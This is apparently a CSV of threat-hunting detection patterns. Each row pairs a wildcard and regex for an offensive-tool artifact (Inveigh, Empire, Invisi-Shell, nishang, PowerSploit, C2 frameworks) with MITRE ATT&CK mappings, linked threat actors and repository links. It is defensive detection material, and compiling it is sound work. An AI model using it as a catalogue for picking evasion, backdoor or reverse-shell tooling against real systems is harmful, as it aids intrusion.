"*Inveigh-net*.zip*",".{0,1000}Inveigh\-net.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","48760"
"*Inveigh-NTLMv1.txt*",".{0,1000}Inveigh\-NTLMv1\.txt.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","48761"
"*Inveigh-NTLMv2.txt*",".{0,1000}Inveigh\-NTLMv2\.txt.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","48762"
"*-InveighRelay *",".{0,1000}\-InveighRelay\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48763"
"*Inveigh-Relay.ps1*",".{0,1000}Inveigh\-Relay\.ps1.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","48764"
"*inveighzero.exe*",".{0,1000}inveighzero\.exe.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","48765"
"*InvisibilityCloak.py*",".{0,1000}InvisibilityCloak\.py.{0,1000}","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","1","N/A","N/A","N/A","6","540","181","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z","48768"
"*Invisi-Shell*",".{0,1000}Invisi\-Shell.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","48769"
"*InvisiShellProfiler.cpp*",".{0,1000}InvisiShellProfiler\.cpp.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","1","N/A","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","48770"
"*InvisiShellProfiler.def*",".{0,1000}InvisiShellProfiler\.def.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","48771"
"*InvisiShellProfiler.dll*",".{0,1000}InvisiShellProfiler\.dll.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","1","N/A","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","48772"
"*InvisiShellProfiler.h*",".{0,1000}InvisiShellProfiler\.h.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","48773"
"*InvisiShellProfiler.pdb*",".{0,1000}InvisiShellProfiler\.pdb.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","48774"
"*InvisiShellProfiler.vcxproj*",".{0,1000}InvisiShellProfiler\.vcxproj.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","48775"
"*invoke obfuscation*",".{0,1000}invoke\sobfuscation.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48776"
"*invoke* -Action command -Execute * -Session*",".{0,1000}invoke.{0,1000}\s\-Action\scommand\s\-Execute\s.{0,1000}\s\-Session.{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","0","N/A","N/A","10","10","17","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z","48777"
"*Invoke-*WDigestDowngrade.ps1*",".{0,1000}Invoke\-.{0,1000}WDigestDowngrade\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","48778"
"*invoke_obfuscation.py*",".{0,1000}invoke_obfuscation\.py.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","48779"
"*invoke_sessiongopher.py*",".{0,1000}invoke_sessiongopher\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","48780"
"*Invoke-AADIntReconAsGuest*",".{0,1000}Invoke\-AADIntReconAsGuest.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","1","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","48784"
"*Invoke-AADIntUserEnumerationAsGuest*",".{0,1000}Invoke\-AADIntUserEnumerationAsGuest.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","1","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","48789"
"*Invoke-AccessCheck -PSRemoting*",".{0,1000}Invoke\-AccessCheck\s\-PSRemoting.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","48792"
"*Invoke-AccessCheck -SMB*",".{0,1000}Invoke\-AccessCheck\s\-SMB.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","48793"
"*Invoke-AccessCheck.ps1*",".{0,1000}Invoke\-AccessCheck\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","1","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","48794"
"*Invoke-AccessCheckForAllGroups*",".{0,1000}Invoke\-AccessCheckForAllGroups.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","48795"
"*Invoke-AccessCheckForAllServicePrincipals*",".{0,1000}Invoke\-AccessCheckForAllServicePrincipals.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","48796"
"*Invoke-AccessCheckForAllUsers*",".{0,1000}Invoke\-AccessCheckForAllUsers.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","48797"
"*Invoke-AccessCheckForCurrentUser*",".{0,1000}Invoke\-AccessCheckForCurrentUser.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","48798"
"*Invoke-AccessCheckForCurrentUser*",".{0,1000}Invoke\-AccessCheckForCurrentUser.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","48799"
"*Invoke-AccessCheckForGroup*",".{0,1000}Invoke\-AccessCheckForGroup.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","48800"
"*Invoke-AccessCheckForServicePrincipal*",".{0,1000}Invoke\-AccessCheckForServicePrincipal.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","48801"
"*Invoke-AccessCheckForUser*",".{0,1000}Invoke\-AccessCheckForUser.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","48802"
"*Invoke-ACLcsvFileAnalysis*",".{0,1000}Invoke\-ACLcsvFileAnalysis.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","48803"
"*Invoke-ACLPwn*",".{0,1000}Invoke\-ACLPwn.{0,1000}","offensive_tool_keyword","Invoke-ACLpwn","Invoke-ACLpwn is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured.","T1098 - T1208 - T1484 - T1486 - T1059","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/fox-it/Invoke-ACLPwn","1","0","N/A","N/A","N/A","6","520","88","2022-09-15T15:13:00Z","2018-04-26T09:21:27Z","48804"
"*Invoke-ACLScanner * -Filter *",".{0,1000}Invoke\-ACLScanner\s.{0,1000}\s\-Filter\s.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","48805"
"*Invoke-ACLScanner * -Name *",".{0,1000}Invoke\-ACLScanner\s.{0,1000}\s\-Name\s.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","48806"
"*Invoke-ACLScanner*",".{0,1000}Invoke\-ACLScanner.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","48807"
"*invoke-aclscanner*",".{0,1000}invoke\-aclscanner.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","48808"
"*Invoke-ACLScanner*",".{0,1000}Invoke\-ACLScanner.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","48809"
"*Invoke-ACLScanner*",".{0,1000}Invoke\-ACLScanner.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","48810"
"*Invoke-ADCSTemplateRecon*",".{0,1000}Invoke\-ADCSTemplateRecon.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","48811"
"*Invoke-Adeleginator*",".{0,1000}Invoke\-Adeleginator.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","48812"
"*Invoke-ADEnum -*",".{0,1000}Invoke\-ADEnum\s\-.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","48813"
"*Invoke-ADEnum.ps1*",".{0,1000}Invoke\-ADEnum\.ps1.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","1","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","48814"
"*Invoke-adPEAS*",".{0,1000}Invoke\-adPEAS.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","48815"
"*Invoke-ADSBackdoor*",".{0,1000}Invoke\-ADSBackdoor.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","48817"
"*Invoke-ADSBackdoor*",".{0,1000}Invoke\-ADSBackdoor.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","48818"
"*Invoke-ADSBackdoor*",".{0,1000}Invoke\-ADSBackdoor.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","48819"
"*Invoke-ADSBackdoor*",".{0,1000}Invoke\-ADSBackdoor.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","48820"
"*Invoke-ADSBackdoor.json*",".{0,1000}Invoke\-ADSBackdoor\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","48821"
"*Invoke-AirstrikeAttackCheck*",".{0,1000}Invoke\-AirstrikeAttackCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","48822"
"*Invoke-AirstrikeAttackCheck*",".{0,1000}Invoke\-AirstrikeAttackCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","48823"
